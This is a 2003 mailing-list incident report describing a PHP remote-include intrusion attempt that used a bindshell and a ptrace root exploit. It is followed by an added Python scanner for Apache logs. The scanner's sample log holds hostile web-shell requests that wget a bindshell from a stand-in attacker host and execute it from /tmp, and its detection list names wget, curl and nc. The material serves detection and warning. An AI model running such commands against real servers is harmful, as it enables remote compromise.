[IOML] Y'all be careful out there...

Dylan Smith dyls at dylansmith.co.im
Sun Apr 27 22:15:02 2003


All,

Today, at 07:32 UTC, someone tried to root (i.e. hack in and gain root
access on) one of my servers via a bug in a PHP script, a bindshell and an
attempt at exploiting the ptrace vulnerability in Linux kernels <= 2.4.19.

If you're running PHP code, and have register_globals ON (as quite a few
scripts require), just a timely reminder that any local root exploit can
easily become a remote root exploit. This particular one went through a news
PHP script which didn't prevent a variable from being initialised by
arguments passed in the URL. It caused the script to run a PHP Unix shell
executor from the cracker's box (http://e-lite.reclone.nl/db_settings.php).
The cracker then used that to execute wget on my box to download an
executable called 'bindshell' into /tmp, and then execute it. Bindshell is a
simple program that listens on port 1234/tcp and attaches /bin/sh to the
resulting socket. From the bindshell (running as user apache, which in
itself can't do much harm), the perpetrator downloaded ptrace-kmod.c,
compiled it with gcc, and then tried to run it. ptrace-kmod is a program
that attacks the ptrace kmod vulnerability in kernels <= 2.4.19 and gains
root access. Fortunately (although I need to run 2.4.19 for the time being),
as soon as I heard of the ptrace vuln, I applied a workaround which stops it
from working. The cracker tried ptrace twice and gave up. Looking at the
Apache logs, they issued quite a few commands with the PHP shell, including,
I assume, a uname -a to see if I was running a vulnerable kernel.

In the mistaken belief my kernel was vulnerable, they tried to gain root
access. The upshot of this is that they ended up leaving lots of logs of
their activities, including the IP address of their machine, a Debian
system on a broadband connection in the Netherlands. Chello.nl abuse has
been informed...

I had a very narrow brush with having my server rooted this
morning...hopefully abuse@chello.nl will LART whoever is in charge of
e-lite.reclone.nl.

-- 
Dylan Smith, Castletown, Isle of Man      | Code fast, crash young and
Flying: http://www.dylansmith.net         | leave a beautiful core.
FFE/Elite Universe: http://www.alioth.net |             -- JK (#afe)
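The attack chain above leaves exactly the trail Dylan describes in the Apache access log: a query-string parameter carrying a full URL (the register_globals remote include), followed by requests whose parameters carry shell commands (uname, wget into /tmp, chmod, the bindshell). The following scanner is an added example, not code from the original post or from the script that was attacked; it parses Common Log Format lines and flags both patterns. The log lines, hostnames (evil.example.net), paths and parameter names (inc, cmd) are constructed for illustration and are not taken from the real incident.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log in Apache Common Log Format. Hostnames,
# paths and parameter names are made up; they are not from the real incident.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Apr/2003:07:32:01 +0000] "GET /news/index.php?id=3 HTTP/1.0" 200 4120
10.0.0.5 - - [27/Apr/2003:07:32:09 +0000] "GET /news/index.php?inc=http://evil.example.net/db_settings.php HTTP/1.0" 200 611
10.0.0.5 - - [27/Apr/2003:07:32:15 +0000] "GET /news/index.php?inc=http://evil.example.net/db_settings.php&cmd=uname%20-a HTTP/1.0" 200 233
10.0.0.5 - - [27/Apr/2003:07:32:40 +0000] "GET /news/index.php?inc=http://evil.example.net/db_settings.php&cmd=cd%20/tmp%3Bwget%20http://evil.example.net/bindshell HTTP/1.0" 200 198
10.0.0.5 - - [27/Apr/2003:07:33:02 +0000] "GET /news/index.php?inc=http://evil.example.net/db_settings.php&cmd=chmod%20755%20/tmp/bindshell%3B/tmp/bindshell HTTP/1.0" 200 150
192.0.2.77 - - [27/Apr/2003:08:10:44 +0000] "GET /news/index.php?id=7&inc=header.inc HTTP/1.0" 200 3981
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that is itself a URL is the register_globals remote-include
# signature: the script include()s whatever the uninitialised variable holds.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Fragments that appear when a dropped web shell is used to relay commands.
CMD_HINTS = ('wget ', 'curl ', '/tmp/', 'gcc ', 'chmod ', 'uname ', 'id;', 'nc ')


def parse_line(line):
    """Split one CLF line into fields and decoded query parameters; None if it doesn't parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # keep_blank_values so that "?cmd=" with an empty value is still visible
    rec['params'] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify_param(name, value):
    """Return the finding kinds one decoded parameter value triggers (may be empty)."""
    kinds = []
    if REMOTE_URL_RE.match(value.strip()):
        kinds.append('remote_include')   # URL handed to an uninitialised PHP variable
    lowered = value.lower()
    if any(hint in lowered for hint in CMD_HINTS):
        kinds.append('command')          # shell command relayed through the web shell
    return kinds


def scan(log_text):
    """Walk the log and return one finding dict per (request, parameter, kind)."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec['params']:
            for kind in classify_param(name, value):
                findings.append({'ip': rec['ip'], 'ts': rec['ts'], 'path': rec['path'],
                                 'kind': kind, 'param': name, 'value': value})
    return findings


def attackers(findings):
    """Findings per source IP, most active first: the list that goes to the abuse desk."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return sorted(counts.items(), key=lambda kv: -kv[1])


if __name__ == '__main__':
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} {f['ip']} {f['kind']:15} {f['param']}={f['value']}")
    print(attackers(hits))
```

Run it against a real access_log by replacing SAMPLE_LOG with the file's contents. A legitimate include such as inc=header.inc produces nothing, while the URL-valued parameter is flagged even before any command is sent, which is the moment to shut the script off. Note that decoding happens before matching, so %20 and %3B obfuscation in the query string does not hide the wget or the /tmp path.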